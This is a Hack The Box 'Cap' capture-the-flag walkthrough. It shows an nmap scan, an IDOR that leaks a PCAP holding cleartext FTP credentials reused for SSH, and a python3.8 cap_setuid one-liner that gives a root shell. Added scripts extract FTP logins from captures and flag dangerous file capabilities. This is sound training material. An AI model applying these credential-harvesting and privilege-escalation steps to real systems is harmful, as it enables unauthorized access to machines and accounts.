
There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!


Enumeration

I began searching this box with a standard nmap scan:

$ sudo nmap -sC -sV -oA nmap/cap 10.129.121.64
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 21:26 EDT
Nmap scan report for 10.129.121.64
Host is up (0.091s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.21 seconds

Foothold

From the scan above, ports 21 (FTP), 22 (SSH) and 80 (HTTP) are open. Browsing to port 80 shows a dashboard of statistics about the web server, including a page that records the last 5 minutes of network traffic and offers the resulting PCAP for download.

Each capture download is addressed by a numeric index, and a fresh capture is handed out at index 1. The server does not check whether the capture at a given index belongs to the requesting user (a classic insecure direct object reference), so simply decrementing the index to 0 returns a PCAP that was recorded earlier. Opening that PCAP and following the TCP stream shows an FTP login in cleartext, with the credentials nathan:Buck3tH4TF0RM3!.
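To make the "view the PCAP" step concrete, here is an added example (not from the original writeup) that parses a pcap file by hand, with no third-party library, and pulls out the FTP USER/PASS commands, marking a login as accepted when the server answers with a 230 reply. The capture it runs on is constructed inline: the client address and port are made up, while the server address and the credentials are the ones from this box.

```python
"""Pull cleartext FTP logins out of a pcap without any third-party library."""
import struct

# Constructed sample session: CLIENT is made up, SERVER is the box's address.
SERVER = ("10.129.121.64", 21)
CLIENT = ("10.10.14.5", 54321)


def _ip_bytes(addr):
    return bytes(int(o) for o in addr.split("."))


def build_tcp_frame(src, dst, payload):
    """Ethernet + IPv4 + TCP frame carrying payload (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", src[1], dst[1], 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     _ip_bytes(src[0]), _ip_bytes(dst[0])) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_pcap(frames):
    """Little-endian pcap (link type 1 = Ethernet) wrapping the given frames."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1622000000 + i, 0, len(frame), len(frame)) + frame
    return out


SAMPLE_PCAP = build_pcap([
    build_tcp_frame(SERVER, CLIENT, b"220 (vsFTPd 3.0.3)\r\n"),
    build_tcp_frame(CLIENT, SERVER, b"USER nathan\r\n"),
    build_tcp_frame(SERVER, CLIENT, b"331 Please specify the password.\r\n"),
    build_tcp_frame(CLIENT, SERVER, b"PASS Buck3tH4TF0RM3!\r\n"),
    build_tcp_frame(SERVER, CLIENT, b"230 Login successful.\r\n"),
])

# pcap magic numbers: microsecond and nanosecond variants, either byte order.
_MAGICS = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">", 0xA1B23C4D: "<", 0x4D3CB2A1: ">"}


def tcp_payloads(pcap):
    """Yield (src_ip, src_port, dst_ip, dst_port, payload) for each TCP segment with data."""
    (magic,) = struct.unpack("<I", pcap[:4])
    if magic not in _MAGICS:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    endian = _MAGICS[magic]
    (linktype,) = struct.unpack(endian + "I", pcap[20:24])
    if linktype != 1:
        raise ValueError("only the Ethernet link type is handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        (total_len,) = struct.unpack("!H", ip[2:4])
        if ip[9] != 6:                                        # not TCP
            continue
        tcp = ip[ihl:total_len]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            src = ".".join(str(b) for b in ip[12:16])
            dst = ".".join(str(b) for b in ip[16:20])
            yield src, sport, dst, dport, payload


def extract_ftp_logins(pcap, ftp_port=21):
    """One dict per FTP control session that sent USER, with the password and
    whether the server replied 230 (login accepted)."""
    sessions = {}
    for src, sport, dst, dport, payload in tcp_payloads(pcap):
        for line in payload.decode("latin-1").split("\r\n"):
            if dport == ftp_port:                       # client -> server command
                s = sessions.setdefault((src, sport, dst, dport), {
                    "client": f"{src}:{sport}", "server": f"{dst}:{dport}",
                    "user": None, "password": None, "accepted": False})
                verb, _, arg = line.partition(" ")
                if verb.upper() == "USER":
                    s["user"] = arg
                elif verb.upper() == "PASS":
                    s["password"] = arg
            elif sport == ftp_port and line.startswith("230"):   # server -> client
                key = (dst, dport, src, sport)
                if key in sessions:
                    sessions[key]["accepted"] = True
    return [s for s in sessions.values() if s["user"] is not None]


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for login in extract_ftp_logins(data):
        print(login)
```

Run it with the downloaded capture as the first argument to get the same answer Wireshark's "Follow TCP Stream" gives; the USER/PASS pairing is tracked per client socket, so a capture with several FTP sessions yields one entry each.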

Those credentials work for the FTP server, which drops you into nathan's home directory. The same username and password are reused for SSH, so you can log in as nathan directly rather than working through FTP.

Privesc

Once logged in over SSH, the privesc portion took me a bit, but checking file capabilities eventually shows that /usr/bin/python3.8 carries the cap_setuid capability:

$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

A file capability is a finer-grained relative of the setuid bit: instead of running as root outright, the binary is granted specific privileges when it is executed. The letters after the + are the capability sets the binary receives: p (permitted), e (effective, meaning the capability is active as soon as the program starts, without it having to raise the capability itself) and i (inheritable). cap_setuid with +eip therefore lets anyone who runs /usr/bin/python3.8 call setuid() to any UID, including 0, and because Python is a general-purpose interpreter the caller decides exactly what runs with that privilege. The cap_net_bind_service on the same binary (binding ports below 1024) is harmless by comparison, and cap_net_raw on ping is the normal distribution default. You may read more about Linux Privilege Escalation using Capabilities.
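As an added example (not part of the original writeup), the following parses getcap -r output and flags binaries whose permitted set includes a capability that an interpreter or arbitrary-code binary can turn into root. The sample text is the getcap output above plus one constructed line for /usr/bin/perl that uses the "path cap=flags" spelling newer libcap versions print; the DANGEROUS set is my own selection, not something getcap provides.

```python
"""Flag file capabilities that hand a local user a path to root."""
import re

# getcap output from the box; the last line is constructed to show the
# '=' spelling and missing ' = ' separator that newer libcap prints.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/perl cap_dac_read_search=ep
"""

# Capabilities that, on something that will run code of the caller's choosing,
# are enough to become root or to read anything root can read (my selection).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}

# One cap_to_text clause: comma-separated names, then =, + or - and a flag string.
_CLAUSE = re.compile(r"^([a-z0-9_,]+)([=+-])([eip]*)$")


def parse_getcap_line(line):
    """Return (path, {cap_name: set_of_flags}) for one getcap line, or None if
    the line is not one. Accepts 'path = clauses' and the newer 'path clauses'."""
    line = line.strip()
    if " = " in line:
        path, rest = line.split(" = ", 1)
    else:
        parts = line.split(None, 1)
        if len(parts) != 2:
            return None
        path, rest = parts
    caps = {}
    for clause in rest.split():
        m = _CLAUSE.match(clause)
        if not m:
            return None
        names, op, flags = m.group(1).split(","), m.group(2), set(m.group(3))
        for name in names:
            cur = caps.setdefault(name, set())
            if op == "=":        # '=' resets the sets for these names, then adds flags
                cur.clear()
                cur |= flags
            elif op == "+":
                cur |= flags
            else:
                cur -= flags
    return path, caps


def find_privesc_candidates(getcap_output, dangerous=DANGEROUS):
    """Binaries granted a dangerous capability in their permitted set; 'effective'
    records whether it is also active at exec without the program raising it."""
    hits = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = sorted(c for c, f in caps.items() if c in dangerous and "p" in f)
        if risky:
            hits.append({"path": path, "caps": risky,
                         "effective": all("e" in caps[c] for c in risky)})
    return hits


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for hit in find_privesc_candidates(text):
        print(hit)
```

Typical use on a target is `getcap -r / 2>/dev/null | python3 capcheck.py`; ping and the gstreamer helper are ignored because cap_net_raw, cap_net_admin and cap_net_bind_service do not by themselves give control over another user's files or processes.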

Running /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' therefore drops you straight into a root shell. Because the process holds CAP_SETUID, setuid(0) sets the real, effective and saved UIDs all to 0, so the bash it spawns is a full root shell with no need for the -p flag. On a real system the fix is to remove the capability (setcap -r /usr/bin/python3.8): a general-purpose interpreter should never carry cap_setuid, and if the web application only needed to bind port 80 that is what cap_net_bind_service alone, or a reverse proxy in front of it, is for.